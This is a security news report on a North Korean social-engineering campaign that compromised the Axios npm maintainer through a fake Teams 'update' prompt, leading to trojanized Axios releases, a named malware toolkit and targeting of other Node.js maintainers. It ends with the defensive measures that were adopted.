UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack
الهاكرز ديال كوريا الشمالية كيستهدفو المطور ديال Axios فـ هجوم متطور على "سلسلة التوريد" (Supply Chain) ديال npm
North Korean Threat Actors Target Axios Maintainer in Sophisticated npm Supply Chain Attack
TL;DR: North Korean threat actors (UNC1069) executed a highly targeted social engineering campaign against the maintainer of the Axios npm package. By impersonating company executives and using fake technical hurdles during video calls, they deployed a Remote Access Trojan (RAT) to steal credentials and publish trojanized versions of Axios (1.14.1 and 0.30.4).
The Social Engineering of Jason Saayman
The maintainer of the Axios npm package, Jason Saayman, recently confirmed that a compromise of the widely used library was the result of an intricate social engineering campaign. Attributed to the North Korean threat group tracked as UNC1069 (also associated with BlueNoroff and "GhostCall"), the attack was tailored specifically to Saayman.
The actors initiated contact by posing as the founder of a legitimate, well-known company. To build rapport and establish a sense of legitimacy, the attackers:
- Cloned Likenesses: Used the identities and appearances of real company founders.
- Fabricated Environments: Invited Saayman to a professional-looking Slack workspace branded with the company’s corporate identity, featuring channels populated with LinkedIn posts.
- Virtual Meetings: Scheduled a meeting via Microsoft Teams to discuss a purported business opportunity.
The "ClickFix" Infection Vector
The attack transitioned from social engineering to technical exploitation during the scheduled Microsoft Teams call. Upon joining, Saayman was presented with a fake error message claiming his system was out of date.
This tactic, documented by researchers at Huntress and Kaspersky, involves a "ClickFix" style pop-up. Victims are told their system is malfunctioning and are instructed to download a malicious SDK to fix the issue. Depending on the victim’s operating system, this triggers a malicious script:
- macOS: Executes AppleScript.
- Windows: Executes PowerShell.
In Saayman’s case, the update triggered the deployment of a Remote Access Trojan (RAT). This gave attackers the access needed to steal npm account credentials and bypass existing security measures to publish two malicious versions of Axios: 1.14.1 and 0.30.4.
The Payload: WAVESHAPER and SilentSiphon
The malicious Axios packages contained an implant known as WAVESHAPER.V2. According to Mandiant and Kaspersky, this is part of a broader malware ecosystem used by North Korean actors:
- CosmicDoor: A Nim-based (macOS) or Go-based (Windows) backdoor used to deliver follow-up payloads.
- SilentSiphon: A comprehensive "stealer suite" designed to harvest credentials from web browsers, password managers, and developer-specific secrets (including GitHub, npm, Yarn, RubyGems, and AWS).
- WAVESHAPER: Serves as a conduit for a variety of other high-end malware, including HYPERCALL, SUGARLOADER, and DEEPBREATH.
A Coordinated Campaign Against the Node.js Ecosystem
Following the Axios incident, several other prominent maintainers revealed they had been targeted by the same group using nearly identical tactics. The campaign appears to be a coordinated effort to compromise high-impact open-source projects.
Targeted individuals included:
- Jordan Harband: Maintainer of ECMAScript polyfills.
- John-David Dalton: Creator of Lodash.
- Matteo Collina: Lead maintainer of Fastify, Pino, and Undici.
- Scott Motte: Creator of dotenv.
- Pelle Wessman: Maintainer of mocha and type-fest.
- Jean Burellier: Node.js core collaborator and Express contributor.
While Saayman was compromised, others evaded the attack. For instance, Pelle Wessman was invited to a fake podcast recording on a site mimicking Streamyard. When he refused to download the "fix" or run a curl command in his terminal, the attackers immediately deleted the evidence and went dark.
Fallout and Defensive Measures
The compromise of Axios is particularly significant due to its massive reach, with nearly 100 million weekly downloads. Because Axios is a core dependency for many other libraries, a poisoned version can propagate rapidly through the entire JavaScript ecosystem.
In response to the attack, Saayman has outlined several restorative and preventative steps:
- Resetting all local devices and account credentials.
- Implementing immutable releases.
- Adopting OIDC (OpenID Connect) flows for package publishing.
- Updating GitHub Actions to follow security best practices.
However, security experts warn that if an attacker gains full control of a maintainer’s machine via a RAT, traditional defenses like 2FA or OIDC may not be enough to prevent a compromise, as the threat actor can hijack active browser sessions and local tokens.
Source: The Hacker News - UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack
